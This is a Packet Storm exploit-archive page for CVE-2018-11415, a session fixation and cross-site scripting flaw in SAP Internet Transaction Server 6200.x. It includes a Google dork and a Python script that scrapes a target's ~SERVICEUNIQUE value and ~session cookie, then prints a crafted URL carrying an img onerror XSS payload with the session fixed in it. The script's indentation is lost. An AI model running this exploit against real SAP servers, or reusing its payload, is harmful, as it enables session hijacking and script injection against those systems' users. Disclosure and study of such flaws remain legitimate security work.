exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting
Posted May 25, 2018
Authored by J. Carillo Lencina

SAP Internet Transaction Server 6200.x suffers from session fixation and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-11415
SHA-256 | c374e8d14e78e73390da1e10fc4c4271a42c7efb1f8f9b21ddcf6ecbea0a04e7

SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting

Change Mirror Download
# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting
# Dork: /scripts/wgate/
# Date: 25.05.2018
# Exploit Author: J. Carrillo Lencina (0xd0m7)
# Vendor Homepage: https://www.sap.com
# Version: SAP ITS 6200.X.X
# Category: Webapps
# Tested on: All Platforms
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11415
# Description:As it has been determined that there are two
vulnerabilities in the latest developed version of SAP ITS, these two
vulnerabilities added together give rise to an XSS.

#Technical details: It has been determined that when an unauthenticated
user navigates through the application, the application assigns a cookie,
that cookie is assigned in the parameter ~ session, therefore it could be
possible for an attacker to fix the fallo ~ session through a request GET
This, together with the fact that the parameter SERVICEUNIQUE has a
parameter validation failure, results in a single-use XSS, since the
session expires once the method of the request is exchanged and fixed in
the URL.

#Exploit
#!/usr/bin/python
import argparse
import requests
import re

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Example: https://example.com/wgate/scripts/ralp/!")
args = parser.parse_args()
list=[]
i=0
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}
url=args.url.split('/')
url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/'

if args.url:
r = requests.get(args.url,verify=False,cookies=cookie)
header = r.headers['Set-Cookie']
cookie_val = header.split(";")

for line in r.iter_lines():
list.append(line)
i=i+1
if line.find('~SERVICEUNIQUE') > 0:
param = line.replace('"','')
v = param.split('=')
val0 = v[3].split(' ')
print '[+]Random Value:',val0[0]

for line2 in range(len(cookie_val)):
if cookie_val[line2].find('~session') == 0:
val1 = cookie_val[line2].split('=')
print '[+]Session Value:',val1[1]
print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]


else:
print '[!] Empty URL, please see help (-h,--help)'

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close